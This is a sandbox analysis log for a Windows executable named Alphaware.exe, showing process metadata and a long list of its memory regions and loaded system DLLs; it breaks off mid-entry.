# Flog Txt Version 1 # Analyzer Version: 2023.2.0 # Analyzer Build Date: Apr 13 2023 06:20:59 # Log Creation Date: 18.05.2023 11:17:26.952 Process: id = "1" image_name = "alphaware.exe" filename = "c:\\users\\keecfmwgj\\desktop\\alphaware.exe" page_root = "0x450b9000" os_pid = "0xea4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x78c" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 119 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 120 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 121 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 122 start_va = 0xf0000 end_va = 0x205fff monitored = 1 entry_point = 0x20200a region_type = mapped_file name = "alphaware.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\alphaware.exe") Region: id = 123 start_va = 0x320000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 124 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 125 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 126 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 127 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 128 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 129 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 130 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 270 start_va = 0x420000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 271 start_va = 0x7fef7570000 end_va = 0x7fef75defff monitored = 1 entry_point = 0x7fef7571134 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 272 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 273 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 274 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 275 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 276 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 277 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 278 start_va = 0x540000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 279 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 280 start_va = 0x540000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 281 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 282 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 283 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 284 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 285 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 286 start_va = 0x740000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 287 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 288 start_va = 0x7fef4a10000 end_va = 0x7fef4ab8fff monitored = 1 entry_point = 0x7fef4a11010 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 289 start_va = 0x7fef9210000 end_va = 0x7fef9212fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 290 start_va = 0x7feff2d0000 end_va = 0x7feff340fff monitored = 0 entry_point = 0x7feff2e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 291 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 292 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 293 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 294 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 295 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 296 start_va = 0x850000 end_va = 0x9d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 297 start_va = 0xc0000 end_va = 0xe8fff monitored = 0 entry_point = 0xc1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 298 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 299 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 300 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 301 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 302 start_va = 0x9e0000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 303 start_va = 0xb70000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 304 start_va = 0x1f70000 end_va = 0x207dfff monitored = 1 entry_point = 0x208200a region_type = mapped_file name = "alphaware.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\alphaware.exe") Region: id = 305 start_va = 0x1f70000 end_va = 0x207dfff monitored = 1 entry_point = 0x208200a region_type = mapped_file name = "alphaware.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\alphaware.exe") Region: id = 306 start_va = 0x7fefc940000 end_va = 0x7fefc94bfff monitored = 0 entry_point = 0x7fefc941064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 307 start_va = 0x7fef1bd0000 end_va = 0x7fef2696fff monitored = 1 entry_point = 0x7fef1bd63a0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 308 start_va = 0x7fef1100000 end_va = 0x7fef1bc6fff monitored = 1 entry_point = 0x7fef11063a0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 309 start_va = 0x7fef1bd0000 end_va = 0x7fef2696fff monitored = 1 entry_point = 0x7fef1bd63a0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 310 start_va = 0x7fef6d20000 end_va = 0x7fef6d35fff monitored = 0 entry_point = 0x7fef6d2c000 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 311 start_va = 0x7fef4950000 end_va = 0x7fef4a0cfff monitored = 0 entry_point = 0x7fef49d7db0 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 312 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 313 start_va = 0xe0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 314 start_va = 0x310000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 315 start_va = 0x7fe92570000 end_va = 0x7fe9257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92570000" filename = "" Region: id = 316 start_va = 0x7fe92580000 end_va = 0x7fe9258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92580000" filename = "" Region: id = 317 start_va = 0x7fe92590000 end_va = 0x7fe9261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92590000" filename = "" Region: id = 318 start_va = 0x7fe92620000 end_va = 0x7fe9268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92620000" filename = "" Region: id = 319 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 320 start_va = 0x4c0000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 321 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 322 start_va = 0x1f70000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 323 start_va = 0x2130000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 324 start_va = 0x2330000 end_va = 0x242ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 325 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 326 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 327 start_va = 0x2430000 end_va = 0x1a42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 328 start_va = 0x1a430000 end_va = 0x1a7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a430000" filename = "" Region: id = 329 start_va = 0x1f70000 end_va = 0x2070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 330 start_va = 0x20b0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 331 start_va = 0x1a800000 end_va = 0x1a8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a800000" filename = "" Region: id = 332 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 333 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 334 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 335 start_va = 0x1a910000 end_va = 0x1aa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a910000" filename = "" Region: id = 336 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 337 start_va = 0x1aa10000 end_va = 0x1acdefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 338 start_va = 0x7fef05d0000 end_va = 0x7fef1bccfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll") Region: id = 339 start_va = 0x7fffff10000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff10000" filename = "" Region: id = 340 start_va = 0x7fffff00000 end_va = 0x7fffff0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff00000" filename = "" Region: id = 341 start_va = 0x7fe92690000 end_va = 0x7fe9270ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92690000" filename = "" Region: id = 342 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 343 start_va = 0x440000 end_va = 0x4bcfff monitored = 0 entry_point = 0x44cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 344 start_va = 0x440000 end_va = 0x4bcfff monitored = 0 entry_point = 0x44cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 345 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 346 start_va = 0x7fe92710000 end_va = 0x7fe9271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92710000" filename = "" Region: id = 347 start_va = 0x7fef7560000 end_va = 0x7fef7562fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 348 start_va = 0x7fef4800000 end_va = 0x7fef494efff monitored = 1 entry_point = 0x7fef4801090 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 349 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 350 start_va = 0x2130000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 351 start_va = 0x2270000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 352 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 353 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 354 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 355 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 356 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 357 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 358 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 359 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 360 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 361 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 362 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 363 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 364 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 365 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 366 start_va = 0x5b0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 367 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 368 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 369 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 370 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 371 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 372 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 373 start_va = 0x2080000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 374 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 375 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 376 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 377 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 378 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 379 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 380 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 381 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 382 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 383 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 384 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 385 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 386 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 387 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 388 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 389 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 390 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 391 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 392 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 393 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 394 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 395 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 396 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 397 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 398 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 399 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 400 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 401 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 402 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 403 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 404 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 405 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 406 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 407 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 408 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 409 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 410 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 411 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 412 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 413 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 414 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 415 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 416 start_va = 0x2080000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 417 start_va = 0x2090000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 418 start_va = 0x20a0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 419 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 420 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 421 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 422 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = 